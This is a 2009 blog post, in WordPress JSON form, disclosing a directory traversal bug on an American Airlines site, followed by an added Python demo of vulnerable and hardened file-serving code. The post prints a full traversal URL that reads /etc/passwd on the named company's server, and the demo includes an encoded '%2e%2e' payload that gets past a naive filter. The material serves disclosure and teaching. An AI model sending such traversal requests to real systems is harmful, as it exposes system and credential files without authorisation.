{"id":551,"date":"2009-07-17T16:51:30","date_gmt":"2009-07-17T09:51:30","guid":{"rendered":"http:\/\/deepquest.code511.com\/blog\/?p=551"},"modified":"2009-07-17T16:55:06","modified_gmt":"2009-07-17T09:55:06","slug":"fly-american-airlines","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/","title":{"rendered":"Fly American AirLines"},"content":{"rendered":"<p>The world of IT security still amazes me every day. You always expect the largest companies to be ultra secure, with data centers in bunkers and private links between branch offices, but the reality is that you always find a careless admin.<\/p>\n<p>The best example is American Airlines (man, that&#8217;s a two-letter domain, aa.com!) suffering from a major directory traversal bug. Check the following screenshots.<!--more--><\/p>\n<div id='gallery-1' class='gallery galleryid-551 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-12\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-12-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-11\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-11-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-10\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-10-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/deepquest.code511.com\/blog\/2009\/07\/fly-american-airlines\/picture-9\/'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-9-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p>That&#8217;s a nasty old-school security problem; the first bugs of this kind showed up around 2000. The traversal lets you browse most of the files on the system: logs, admin password files and more.<\/p>\n<p>The funniest part is that American Airlines also has a firewall and probably an Intrusion Detection System: <a href=\"http:\/\/www.aa.com.pe\/aa\/i18nForward.do?p=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\" target=\"_self\">http:\/\/www.aa.com.pe\/aa\/i18nForward.do?p=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/a><\/p>\n<p>The link will lead you either to the file shown above or to this one<img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-560\" title=\"Cannot serve URLs with ..'s in them (my ass)\" src=\"http:\/\/deepquest.code511.com\/blog\/wp-content\/uploads\/2009\/07\/Picture-14.png\" alt=\"Cannot serve URLs with ..'s in them (my ass)\" width=\"1074\" height=\"506\" \/>:<\/p>\n<p>Looks like very, very strong security: &#8220;Cannot serve URLs with ..&#8217;s in them&#8221;. Just reload the page and the target file shows up&#8230; An error that only appears some of the time is not a fix: whatever rejects the &#8220;..&#8221; is clearly not the code that resolves the path and opens the file.<\/p>\n<p>Amazing world of IT security, every day we have something new to discover.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>American Airlines let hackers access sensitive files because of an old directory traversal bug.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[32,31,29,30],"class_list":["post-551","post","type-post","status-publish","format-standard","hentry","category-security","tag-american-airlines","tag-corporate","tag-disclosure","tag-hack"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-8T","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/551","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=551"}],"version-history":[{"count":7,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/551\/revisions"}],"predecessor-version":[{"id":563,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/551\/revisions\/563"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=551"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/bl
og\/wp-json\/wp\/v2\/categories?post=551"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=551"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
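The bug the post describes, as an added example that is not code from aa.com, from the post's author, or from any real application: a forwarder that turns a `p=` parameter (like the `i18nForward.do?p=` in the post's URL) into a file path and opens it, next to the kind of substring filter behind a "Cannot serve URLs with ..'s in them" message, and a hardened version that confines the resolved path to the web root. `WEB_ROOT`, the function names and the sandbox files are assumptions made for the demo; the sandbox stands in for the real filesystem so the traversal stays inside a temp directory.

```python
"""Directory traversal via a forward parameter: vulnerable vs hardened.

Added example for this post, not code from aa.com or its author. It
models a parameter like the `p=` of `i18nForward.do` that the server
turns into a file path. WEB_ROOT, the function names and the sandbox
files are assumptions made for the demo.
"""
import os
import tempfile
from urllib.parse import unquote

# Constructed sandbox: a fake web root two directories below a fake
# filesystem root, plus a fake /etc/passwd outside the web root.
SANDBOX = tempfile.mkdtemp(prefix="traversal-demo-")
WEB_ROOT = os.path.join(SANDBOX, "www", "aa")
os.makedirs(os.path.join(WEB_ROOT, "i18n"))
with open(os.path.join(WEB_ROOT, "i18n", "en.properties"), "w") as f:
    f.write("greeting=Welcome\n")
os.makedirs(os.path.join(SANDBOX, "etc"))
with open(os.path.join(SANDBOX, "etc", "passwd"), "w") as f:
    f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed line, not a real file


def forward_vulnerable(p: str) -> str:
    """The bug on the page: join the parameter onto the root and open it.

    Every `..` in `p` is honoured, so the caller can walk out of
    WEB_ROOT. On a real box `..` at `/` stays at `/`, which is why the
    long run of `../` in the post's URL costs the attacker nothing; in
    this sandbox two are enough to reach SANDBOX/etc/passwd.
    """
    path = os.path.join(WEB_ROOT, unquote(p))
    with open(path) as f:
        return f.read()


def naive_filter_blocks(p: str) -> bool:
    """A check of the "Cannot serve URLs with ..'s in them" kind.

    A substring test on the raw query string (assumed to sit in front of
    the application). It catches a literal `../` but not `%2e%2e/`,
    which the application decodes afterwards, so it is a speed bump,
    not a fix.
    """
    return ".." in p


def forward_safe(p: str) -> str:
    """Hardened version: decode, resolve, then confine to WEB_ROOT.

    os.path.realpath collapses `..`, repeated separators and symlinks,
    so the comparison is made on the path that will actually be opened,
    not on the attacker's spelling of it. An absolute `p` (os.path.join
    discards the root in that case) is rejected by the same check.
    """
    root = os.path.realpath(WEB_ROOT)
    requested = os.path.realpath(os.path.join(root, unquote(p)))
    if os.path.commonpath([root, requested]) != root:
        raise PermissionError(f"refusing path outside web root: {p!r}")
    with open(requested) as f:
        return f.read()


def is_refused(handler, p: str) -> bool:
    """True when the handler refuses `p` instead of serving a file."""
    try:
        handler(p)
    except (PermissionError, FileNotFoundError):
        return True
    return False


if __name__ == "__main__":
    for payload in ("i18n/en.properties", "../../etc/passwd",
                    "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{payload:26} filter blocks={naive_filter_blocks(payload)}"
              f"  vulnerable refuses={is_refused(forward_vulnerable, payload)}"
              f"  safe refuses={is_refused(forward_safe, payload)}")
```

The point of `forward_safe` is where the check happens: after decoding and after `realpath`, on the exact path that will be opened. A filter that looks for the characters `..` in the request, like the one the error message on the page suggests, is checking the attacker's spelling rather than the result, and any encoding or normalization step between the filter and the `open()` call reopens the hole.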